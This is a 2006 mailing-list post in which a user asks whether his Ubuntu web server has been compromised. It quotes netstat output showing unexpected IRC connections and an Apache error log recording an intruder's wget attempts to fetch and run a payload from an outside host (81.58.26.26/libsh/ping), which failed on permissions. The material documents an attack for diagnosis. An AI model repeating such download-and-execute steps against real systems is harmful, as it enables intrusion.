[H-GEN] apache2 compromised or just attempts?

Troy Piggins troy at piggo.com
Sun May 28 20:21:47 EDT 2006


* Troy Piggins <troy at piggo.com> :
> 
[snip]
> Yesterday the web server stopped working.  It is not showing up in 'pstree'.
> Look at netstat and this is the (worrying) output:
> 
> -----8<-----
> Active Internet connections (w/o servers)
> Proto Recv-Q Send-Q Local Address           Foreign Address         State
> tcp        0      0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
> tcp        0      0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
> tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:43411         zagreb.hr.eu.under:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:55893         lemming.euronet.nl:ircd ESTABLISHED
> tcp        0      0 10.1.1.11:47631         checkip.chi.dyndns.:www CLOSE_WAIT
> tcp        0      0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
> tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
> tcp        1      0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
> [snip]
> -----8<-----
> 
> 10.1.1.11 is my ubuntu machine's ip address of it's wireless card connection
> to my wireless modem/router.
> 
> What the hell are those ircd entries?  Am I compromised?  What is my next
> step?

I've since found out that it's a horde 3 vulnerability - well that's the likely
candidate at the moment.

I've uninstalled it, but how do I stop those irc servers.

> [1] extract of /var/log/apache1/error.log.4.gz
> 
> -----8<-----
> [Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script
> '/var/www/thisd
> oesnotexistahaha.php' not found or unable to stat
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
> /
> var/www/horde-cvs
> [Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
> /
> var/www/pub/horde-cvs
> --20:41:57--  http://81.58.26.26/libsh/ping.txt
>            => `ping.txt'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 358 [text/plain]
> ping.txt: Permission denied
> 
> Cannot write to `ping.txt' (Permission denied).
> mv: cannot stat `ping.txt': No such file or directory
> perl: warning: Setting locale failed.
> perl: warning: Please check that your locale settings:
>         LANGUAGE = "en_US",
>         LC_ALL = (unset),
>         LANG = "en_US"
>     are supported and installed on your system.
> perl: warning: Falling back to the standard locale ("C").
> Can't open perl script "temp2006": No such file or directory
> --20:41:57--  http://81.58.26.26/libsh/ping
>            => `ping'
> Connecting to 81.58.26.26:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 15,808 (15K) [text/plain]
> ping: Permission denied
> 
> Cannot write to `ping' (Permission denied).
> chmod: invalid mode string: `x'
> sh: ./ping: No such file or directory
> sh: curl: command not found
> -----8<-----

-- 
Troy Piggins
  ,-o    Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
 o   )   postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
  `-o    slrn 0.9.8.1/rt (score_color patch), vim 7.0




More information about the General mailing list